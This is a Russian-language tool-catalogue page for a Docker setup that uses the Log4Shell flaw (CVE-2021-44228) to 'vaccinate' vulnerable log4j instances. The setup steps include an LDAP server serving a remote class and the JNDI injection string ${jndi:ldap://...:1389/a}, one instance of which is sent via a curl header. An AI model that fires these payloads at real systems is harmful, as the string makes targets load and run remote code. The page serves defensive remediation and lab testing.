Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jeffbryner/log4j-docker-vaccine
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

решение на docker compose для запуска среды вакцинации для уязвимости log4j2 CVE-2021-44228

Репозиторий
24 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Вакцина Log4j в Docker

Контейнеризированный способ запуска вакцины log4j, предлагаемой Cyberreason

  • https://github.com/Cybereason/Logout4Shell

Запуск

Клонируйте этот репозиторий:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

Отредактируйте файл containers.env, указав точный частный или публичный IP/DNS, к которому ваша цель может получить доступ. Запись по умолчанию, скорее всего, не будет работать для вас!

Соберите и запустите контейнеры:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

Теперь у вас есть прослушивающий LDAP-сервер, который будет отдавать класс Log4jRCE для инокуляции уязвимого экземпляра log4j.

Вы можете открыть доступ к нему из интернета (если хотите) с помощью ngrok.

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

Вы можете отправить на него уязвимый экземпляр log4j, используя печально известную входную строку jndi:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

Тестирование

Существует специально уязвимая версия log4j в контейнере, доступная по адресу:

  • https://github.com/christophetd/log4shell-vulnerable-app

Вы можете следовать их инструкциям для её запуска и использования в тестировании:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

И запустить инокуляцию через:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
Скачать инструмент